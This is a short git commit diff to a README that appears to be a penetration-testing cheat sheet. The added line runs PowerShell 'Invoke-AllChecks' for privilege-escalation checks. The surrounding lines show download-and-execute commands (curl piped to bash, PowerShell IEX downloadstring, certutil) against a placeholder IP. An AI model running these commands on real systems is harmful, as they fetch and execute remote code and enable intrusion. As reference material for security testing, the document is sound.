Update README.md
This commit is contained in:
@@ -754,6 +754,7 @@ curl {IP ADDRESS}/{FILE.sh} | bash
|
|||||||
|
|
||||||
# Windows - Download file and execute in powershell:
|
# Windows - Download file and execute in powershell:
|
||||||
powershell -c 'IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/{FILE}")'
|
powershell -c 'IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/{FILE}")'
|
||||||
|
powershell -c 'Invoke-AllChecks'
|
||||||
|
|
||||||
# Windows - Download file using certutil
|
# Windows - Download file using certutil
|
||||||
certutil -split -f -urlcache http://{IP ADDRESS}/{FILE}
|
certutil -split -f -urlcache http://{IP ADDRESS}/{FILE}
|
||||||
|
|||||||
Reference in New Issue
Block a user